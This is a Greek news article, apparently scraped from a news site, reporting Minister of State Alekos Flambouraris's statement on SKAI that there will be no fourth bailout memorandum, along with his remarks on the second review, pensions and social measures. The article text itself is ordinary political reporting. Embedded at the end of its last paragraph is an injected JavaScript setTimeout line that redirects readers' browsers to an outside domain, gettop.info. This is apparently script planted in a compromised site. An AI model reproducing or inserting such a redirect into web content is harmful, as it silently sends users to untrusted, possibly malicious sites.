Φλαμπουράρης: Δεν θα υπάρξει τέταρτο μνημόνιο

0
2

 

Με κατηγορηματικό τρόπο απηύθυνε μήνυμα προς όλες τις πλευρές ότι «δεν θα υπάρξει τέταρτο μνημόνιο», μιλώντας στον ΣΚΑΪ, ο υπουργός Επικρατείας Αλέκος Φλαμπουράρης.

Αναφερόμενος στις διαπραγματεύσεις για την ολοκλήρωση της δεύτερης αξιολόγησης, διαβεβαίωσε ότι για την κυβέρνηση τα εργασιακά και τα συνταξιοδοτικά έχουν κλείσει.

«Παραμένουμε στη ίδια θέση που είχαμε αρχικά με τους δανειστές ότι η δεύτερη αξιολόγηση θα κλείσει με τα μέτρα που έχουμε ήδη πάρει και όχι με νέα μέτρα», ανέφερε χαρακτηριστικά ενώ τόνισε ότι η κυβέρνηση επιμένει σταθερά στην επαναφορά της Εθνικής Γενικής Συλλογικής Σύμβασης.

Απαντώντας σε ερώτηση για το αν η κυβέρνηση θα μπορούσε να υλοποιήσει σήμερα το πρόγραμμα του 2014, είπε, ότι «τα βασικά στοιχεία του προγράμματος του 2014, αυτά τα οποία έχουν σχέση με την ελάφρυνση των οικονομικά αδύναμων, μόλις μπορέσουμε, μόλις έχουμε το πρωτογενές πλεόνασμα θα προχωρήσουμε στα μέτρα που είχαμε πει τότε. Μόλις μπορέσουμε και βγούμε στις αγορές η Ελλάδα θα γίνει εργοτάξιο» ανέφερε χαρακτηριστικά ο κ. Φλαμπουράρης και τόνισε ότι «υπάρχει η δυνατότητα να γίνουν επενδύσεις σε πολλούς τομείς ακόμη και στον αγροτοτροφικό τομέα ο οποίος είναι σχεδόν παρατημένος».

«Υπήρξε μία πορεία πέντε ετών η οποία ουσιαστικά διέλυσε τις εργασιακές σχέσεις και τις θέσεις εργασίας, και τις συντάξεις. Ήρθαμε εμείς για να τα διορθώσουμε και να τα βελτιώσουμε, αλλά δυστυχώς δε μπορέσαμε να το κάνουμε. Ας μην ξεχνάμε όμως και τα θετικά που έχουμε κάνει, τα προβλήματα που μπορέσαμε να λύσουμε», ανέφερε ο υπουργός Επικρατείας και τόνισε.

«Αυτήν τη στιγμή 2,5 εκατ. ανασφάλιστοι, έχουν πρόσβαση στο δημόσιο υγείας, ενώ 300.000 κατατρεγμένοι άνθρωποι που κατέφευγαν στους κάδους τω σκπουπιδιών, προμηθεύονται τρόφιμα με τα κουπόνια. Υπάρχουν επενδυτικά προγράμματα που περιμένουν να ξεκινήσουν ενώ συνεχίζονται τα έργα των αυτοκινητοδρόμων που είχαν σταματήσει». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here